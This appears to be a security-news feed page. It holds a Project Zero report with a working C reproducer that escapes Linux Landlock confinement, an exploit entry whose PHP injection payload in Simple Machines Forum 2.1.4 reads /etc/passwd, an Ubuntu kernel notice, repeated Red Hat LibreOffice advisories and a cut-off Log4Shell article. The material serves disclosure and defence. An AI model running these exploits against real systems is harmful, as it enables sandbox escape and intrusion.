Linux has an issue where landlock can be disabled thanks to a missing cred_transfer hook.

    Linux: landlock can be disabled thanks to missing cred_transfer hook; and Smack looks dodgy tooI found a logic bug that makes it possible for a process to get rid of all Landlock restrictions applied to it:When a process' cred struct is replaced, this _almost_ always invokes the cred_prepare LSM hook; but in one special case (when KEYCTL_SESSION_TO_PARENT updates the parent's credentials), the cred_transfer LSM hook is used instead. Landlock only implements the cred_prepare hook, not cred_transfer, so KEYCTL_SESSION_TO_PARENT causes all information on Landlock restrictions to be lost.The one piece of good news about this is that it requires access to the keyctl() syscall; and I think Landlock is typically used in combination with some kind of seccomp allowlist, which will probably _usually_ make this issue unreachable from sandboxed code?I had a look at the other LSMs that have cred_prepare or cred_transfer hooks: - AppArmor handles both hooks in the same way, that's fine - SELinux handles both hooks in the same way, that's fine - Tomoyo only handles cred_prepare, not cred_transfer, but it only uses the   hook for something weird that's unrelated to the actual cred structs, so   that's probably fine - Smack handles both but handles them differently; smack_cred_transfer() only   transfers a subset of the information that smack_cred_prepare() transfers.   That looks a bit dodgy to me but I don't really understand Smack - Casey, can   you check if Smack handles KEYCTL_SESSION_TO_PARENT correctly?I will send a suggested fix for Landlock in a minute.Here's a reproducer for escaping from Landlock confinement, tested on latestmainline (at commit 786c8248dbd33a5a7a07f7c6e55a7bfc68d2ca48):```user@vm:~/landlock-houdini$ cat landlock-houdini.c#define _GNU_SOURCE#include <unistd.h>#include <err.h>#include <stdint.h>#include <stdlib.h>#include <fcntl.h>#include <stdio.h>#include <sys/prctl.h>#include <sys/wait.h>#include <sys/syscall.h>#include <linux/keyctl.h>/* stuff from the landlock header */struct landlock_ruleset_attr {        uint64_t handled_access_fs;};#define LANDLOCK_ACCESS_FS_WRITE_FILE                   (1ULL << 1)#define SYSCHK(x) ({          \\  typeof(x) __res = (x);      \\  if (__res == (typeof(x))-1) \\    err(1, \"SYSCHK(\" #x \")\"); \\  __res;                      \\})int main(void) {  /* == tell landlock to block opening any files for writing == */  SYSCHK(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0));        struct landlock_ruleset_attr ruleset_attr = {                .handled_access_fs = LANDLOCK_ACCESS_FS_WRITE_FILE        };  int ruleset = SYSCHK(syscall(444/*__NR_landlock_create_ruleset*/, &ruleset_attr, sizeof(ruleset_attr), 0));  SYSCHK(syscall(446/*__NR_landlock_restrict_self*/, ruleset, 0));  /* == make sure we really can't open files for writing == */  int open_res = open(\"/dev/null\", O_WRONLY);  if (open_res != -1)    errx(1, \"open for write still worked after sandboxing???\");  perror(\"open for write failed as expected\");  /* == try to escape from landlock == */  /* needed for KEYCTL_SESSION_TO_PARENT permission checks */  SYSCHK(syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING, NULL, 0, 0, 0));  pid_t child = SYSCHK(fork());  if (child == 0) {    /*     * KEYCTL_SESSION_TO_PARENT is a no-op unless we have a different session     * keyring in the child, so make that happen.     */    SYSCHK(syscall(__NR_keyctl, KEYCTL_JOIN_SESSION_KEYRING, NULL, 0, 0, 0));    /*     * This is where the magic happens:     * KEYCTL_SESSION_TO_PARENT installs credentials on the parent that     * never go through the cred_prepare hook, this path uses cred_transfer     * instead.     * So basically after this call, the parent's landlock restrictions     * are gone.     */    SYSCHK(syscall(__NR_keyctl, KEYCTL_SESSION_TO_PARENT, 0, 0, 0, 0));    exit(0);  }  int wstatus;  SYSCHK(waitpid(child, &wstatus, 0));  if (!WIFEXITED(wstatus) || WEXITSTATUS(wstatus) != 0)    errx(1, \"child failed unexpectedly, unable to test bug\");  /* retry the same operation that was previously blocked to see if we escaped */  int open_res2 = open(\"/dev/null\", O_WRONLY);  if (open_res2 != -1)    errx(1, \"open for write works again, VULNERABLE!\");  perror(\"open for write failed as it should, seems fixed\");}user@vm:~/landlock-houdini$ gcc -o landlock-houdini landlock-houdini.c -Walluser@vm:~/landlock-houdini$ ./landlock-houdiniopen for write failed as expected: Permission deniedlandlock-houdini: open for write works again, VULNERABLE!user@vm:~/landlock-houdini$```This bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2024-10-22.For more details, see the Project Zero vulnerability disclosure policy:https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.htmlRelated CVE Numbers: CVE-2024-42318.Found by: jannh@google.com

Linux Landlock Logic Bug

Ubuntu Security Notice 6951-3 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-6951-3August 19, 2024linux-azure-5.4 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:   - ARM64 architecture;   - M68K architecture;   - User-Mode Linux (UML);   - x86 architecture;   - Accessibility subsystem;   - Character device driver;   - Clock framework and drivers;   - CPU frequency scaling framework;   - Hardware crypto device drivers;   - Buffer Sharing and Synchronization framework;   - FireWire subsystem;   - GPU drivers;   - HW tracing;   - Macintosh device drivers;   - Multiple devices driver;   - Media drivers;   - Network drivers;   - Pin controllers subsystem;   - S/390 drivers;   - SCSI drivers;   - SoundWire subsystem;   - Greybus lights staging drivers;   - TTY drivers;   - Framebuffer layer;   - Virtio drivers;   - 9P distributed file system;   - eCrypt file system;   - EROFS file system;   - Ext4 file system;   - F2FS file system;   - JFFS2 file system;   - Network file system client;   - NILFS2 file system;   - SMB network file system;   - Kernel debugger infrastructure;   - IRQ subsystem;   - Tracing infrastructure;   - Dynamic debug library;   - 9P file system network protocol;   - Bluetooth subsystem;   - Networking core;   - IPv4 networking;   - IPv6 networking;   - Netfilter;   - NET/ROM layer;   - NFC subsystem;   - NSH protocol;   - Open vSwitch;   - Phonet protocol;   - TIPC protocol;   - Unix domain sockets;   - Wireless networking;   - eXpress Data Path;   - XFRM subsystem;   - ALSA framework;(CVE-2024-36934, CVE-2024-38578, CVE-2024-38600, CVE-2024-27399,CVE-2024-39276, CVE-2024-38596, CVE-2024-36933, CVE-2024-36919,CVE-2024-35976, CVE-2024-37356, CVE-2023-52585, CVE-2024-38558,CVE-2024-38560, CVE-2024-38634, CVE-2024-36959, CVE-2024-38633,CVE-2024-36886, CVE-2024-27398, CVE-2024-39493, CVE-2024-26886,CVE-2024-31076, CVE-2024-38559, CVE-2024-38615, CVE-2024-36971,CVE-2024-38627, CVE-2024-36964, CVE-2024-38780, CVE-2024-37353,CVE-2024-38621, CVE-2024-36883, CVE-2024-39488, CVE-2024-38661,CVE-2024-36939, CVE-2024-38589, CVE-2024-38565, CVE-2024-38381,CVE-2024-35947, CVE-2024-36905, CVE-2022-48772, CVE-2024-36017,CVE-2024-36946, CVE-2024-27401, CVE-2024-38579, CVE-2024-38612,CVE-2024-38598, CVE-2024-38635, CVE-2024-38587, CVE-2024-38567,CVE-2024-38549, CVE-2024-36960, CVE-2023-52752, CVE-2024-27019,CVE-2024-38601, CVE-2024-39489, CVE-2024-39467, CVE-2023-52882,CVE-2024-38583, CVE-2024-39480, CVE-2024-38607, CVE-2024-36940,CVE-2024-38659, CVE-2023-52434, CVE-2024-36015, CVE-2024-38582,CVE-2024-36950, CVE-2024-38552, CVE-2024-33621, CVE-2024-36954,CVE-2024-39475, CVE-2024-39301, CVE-2024-38599, CVE-2024-36902,CVE-2024-36286, CVE-2024-38613, CVE-2024-38637, CVE-2024-36941,CVE-2024-36014, CVE-2024-38618, CVE-2024-36904, CVE-2024-36270,CVE-2024-39292, CVE-2024-39471, CVE-2022-48674)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS   linux-image-5.4.0-1135-azure    5.4.0-1135.142~18.04.1                                   Available with Ubuntu Pro   linux-image-azure               5.4.0.1135.142~18.04.1                                   Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6951-3   https://ubuntu.com/security/notices/USN-6951-2   https://ubuntu.com/security/notices/USN-6951-1   CVE-2022-48674, CVE-2022-48772, CVE-2023-52434, CVE-2023-52585,   CVE-2023-52752, CVE-2023-52882, CVE-2024-26886, CVE-2024-27019,   CVE-2024-27398, CVE-2024-27399, CVE-2024-27401, CVE-2024-31076,   CVE-2024-33621, CVE-2024-35947, CVE-2024-35976, CVE-2024-36014,   CVE-2024-36015, CVE-2024-36017, CVE-2024-36270, CVE-2024-36286,   CVE-2024-36883, CVE-2024-36886, CVE-2024-36902, CVE-2024-36904,   CVE-2024-36905, CVE-2024-36919, CVE-2024-36933, CVE-2024-36934,   CVE-2024-36939, CVE-2024-36940, CVE-2024-36941, CVE-2024-36946,   CVE-2024-36950, CVE-2024-36954, CVE-2024-36959, CVE-2024-36960,   CVE-2024-36964, CVE-2024-36971, CVE-2024-37353, CVE-2024-37356,   CVE-2024-38381, CVE-2024-38549, CVE-2024-38552, CVE-2024-38558,   CVE-2024-38559, CVE-2024-38560, CVE-2024-38565, CVE-2024-38567,   CVE-2024-38578, CVE-2024-38579, CVE-2024-38582, CVE-2024-38583,   CVE-2024-38587, CVE-2024-38589, CVE-2024-38596, CVE-2024-38598,   CVE-2024-38599, CVE-2024-38600, CVE-2024-38601, CVE-2024-38607,   CVE-2024-38612, CVE-2024-38613, CVE-2024-38615, CVE-2024-38618,   CVE-2024-38621, CVE-2024-38627, CVE-2024-38633, CVE-2024-38634,   CVE-2024-38635, CVE-2024-38637, CVE-2024-38659, CVE-2024-38661,   CVE-2024-38780, CVE-2024-39276, CVE-2024-39292, CVE-2024-39301,   CVE-2024-39467, CVE-2024-39471, CVE-2024-39475, CVE-2024-39480,   CVE-2024-39488, CVE-2024-39489, CVE-2024-39493

Ubuntu Security Notice USN-6951-3

Simple Machines Forum version 2.1.4 suffers from an authenticated code injection vulnerability.

    # Exploit Title:  Authenticated Code Injection - smfv2.1.4# Date: 8/2024# Exploit Author: Andrey Stoykov# Version: 2.1.4# Tested on: Ubuntu 22.04# Blog:https://msecureltd.blogspot.com/2024/06/friday-fun-pentest-series-7-smfv214.htmlCode Injection Authenticated:Steps to Reproduce:1. Login as admin2. Browse to "Current Theme"3. Click on "Modify Themes" > "SMF Default Theme"4. Click on Admin.template.php5. In the first box enter the PHP payload "<?php system('cat /etc/passwd')?>"// HTTP POST request showing the code injection payloadPOST /SMFdbwci7dy0o/index.php?action=admin;area=theme;th=1;sa=edit HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7[...]entire_file[]=<?php+system('cat /etc/passwd') ?>[...]// HTTP response showing /etc/passwd contentsHTTP/1.1 200 OKServer: ApachePragma: no-cache[...][...]root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin[...]

Simple Machines Forum 2.1.4 Code Injection

Red Hat Security Advisory 2024-5608-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5608.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreoffice security updateAdvisory ID:        RHSA-2024:5608-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5608Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-6472====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: bility to trust not validated macro signatures removed in high security mode (CVE-2024-6472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6472References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-5608-03

Red Hat Security Advisory 2024-5607-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5607.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreoffice security updateAdvisory ID:        RHSA-2024:5607-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5607Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-6472====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: bility to trust not validated macro signatures removed in high security mode (CVE-2024-6472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6472References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-5607-03

Red Hat Security Advisory 2024-5599-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5599.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreoffice security updateAdvisory ID:        RHSA-2024:5599-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5599Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-6472====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: bility to trust not validated macro signatures removed in high security mode (CVE-2024-6472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6472References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-5599-03

Red Hat Security Advisory 2024-5598-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5598.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreoffice security updateAdvisory ID:        RHSA-2024:5598-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5598Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-6472====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: bility to trust not validated macro signatures removed in high security mode (CVE-2024-6472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6472References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-5598-03

Red Hat Security Advisory 2024-5584-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5584.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreoffice security updateAdvisory ID:        RHSA-2024:5584-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5584Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-6472====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: bility to trust not validated macro signatures removed in high security mode (CVE-2024-6472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6472References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-5584-03

Red Hat Security Advisory 2024-5583-03 - An update for libreoffice is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5583.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libreoffice security updateAdvisory ID:        RHSA-2024:5583-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5583Issue date:         2024-08-20Revision:           03CVE Names:          CVE-2024-6472====================================================================Summary: An update for libreoffice is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:LibreOffice is an open source, community-developed office productivity suite. It includes key desktop applications, such as a word processor, a spreadsheet, a presentation manager, a formula editor, and a drawing program. LibreOffice replaces OpenOffice and provides a similar but enhanced and extended office suite.Security Fix(es):* libreoffice: bility to trust not validated macro signatures removed in high security mode (CVE-2024-6472)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6472References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-5583-03

In today's rapidly evolving cyber threat landscape, organizations face increasingly sophisticated attacks targeting their applications. Understanding these threats and the technologies designed to combat them is crucial. This article delves into the mechanics of a common application attack, using the infamous Log4Shell vulnerability as an example, and demonstrates how Application Detection and

Tag

#mac